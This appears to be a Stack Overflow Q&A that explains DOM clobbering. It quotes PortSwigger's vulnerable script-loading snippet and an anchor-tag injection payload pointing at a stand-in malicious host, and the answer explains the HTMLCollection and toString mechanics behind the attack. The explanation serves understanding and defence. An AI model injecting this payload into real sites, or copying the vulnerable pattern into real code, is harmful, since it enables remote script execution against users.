# DOM Clobbering and how it works

Tags: javascript, html, dom, frontend, web-application-security

I have some questions to the topic of [DOM Clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering):

Portswigger explains it with:

```
 <script>
 window.onload = function(){
    let someObject = window.someObject || {};
    let script = document.createElement('script');
    script.src = someObject.url;
    document.body.appendChild(script);
 };
</script>
```

> To exploit this vulnerable code, you could inject the following HTML
> to clobber the someObject reference with an anchor element:

```
<a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>
```

> As the two anchors use the same ID, the DOM groups them together in a
> DOM collection. The DOM clobbering vector then overwrites the
> someObject reference with this DOM collection. A name attribute is
> used on the last anchor element in order to clobber the url property
> of the someObject object, which points to an external script.

My understanding is:

The anchor elements with id `someObject` are stored in an array-like structure - a DOM collection.

Via

```
var someObject = window.someObject || {};
```

the anchor element is referred using the id - some browsers store ids directly in the window object ([Are IDs for an html element always available from the window object?](https://stackoverflow.com/questions/15767961/are-ids-for-an-html-element-always-available-from-the-window-object)).

However:

- Why does the name attribute override the url property with the URL?
- What has the DOM collection to do with all this?
- Does the object initializer in `window.someObject || {}` (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Object_initializer) play any role for the attack?

This is what the console says:

[image: Console part 1]
[image: Console part 2]

(Further information about this topic can also be found here: https://medium.com/@shilpybanerjee/dom-clobbering-its-clobbering-time-f8dd5c8fbc4b)

Comment: Way back in the old days we would write `document.all.something` to get the element with `name="something"`. This was before the time of `getElementById()`. DOM collections were accessible using element names as keys. Also, `HTMLAnchorElement.toString()` returns the resolved `href` value, which is used in this vector.

Answer (score 7, accepted):

> Why does the name attribute override the url property with the URL?

Because `someObject` is actually an HTMLCollection and you can access named elements in an `HTMLCollection` by their name.

```js
console.log( document.getElementsByClassName("test").bar );
```

```html
<div class="test" name="foo"><div><div class="test" name="bar"></div>
```

> What has the DOM collection to do with all this?

Notice how they do have two elements with the same `id` attribute? Well, even though it's against the specs, the same specs actually have a special rule handling this case when accessing named elements as `window`'s properties: [specs](https://html.spec.whatwg.org/multipage/window-object.html#named-access-on-the-window-object)

> 3. Otherwise, if objects has only one element, return that element.
> 4. Otherwise return an HTMLCollection rooted at window's associated Document, whose filter matches only named objects of window with the name name. (By definition, these will all be elements.)

I think only Chrome does respect the specs here, so in this browser, if you access an element through its `id` like this and there are multiple elements with the same  ìd`, you get an HTMLCollection instead of an Element:

```js
console.log( window.foo ); // in Chrome [HTMLCollection]
```

```html
<div id="foo">1</div><div id="foo">2</div>
```

> Does the object initializer in window.someObject || {} (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Object_initializer) play any role for the attack?

This is just to avoid having `null` in case there is no element with this `id` at the time the handler fires, so it's mainly useless here.

> Last question: Why does `script.src = someObject.url;` extract the href out of the whole anchor element?

Because [HTMLAnchorElement.toString()](https://developer.mozilla.org/en-US/docs/Web/API/HTMLAnchorElement/toString) returns the `.href` value.

Comment: Last question:  Why does `script.src = someObject.url;` extract the href out of the whole anchor element?

Comment: Sorry went AFK right after posting. It's because `<a>.toString()` returns the `href` of the anchor. https://stackoverflow.com/questions/11076627/why-alert-anchorelement-a-alerts-the-href-attribute Don't ask, this code is a compilation of the worst horrors the specs have accumulated accross the ages and it demonstrates pretty well why it's bad...

Comment: @Kaiido Where do you learn this kind of stuff? Just genuinely curious. I couldn't find anything remotely as useful as this answer was.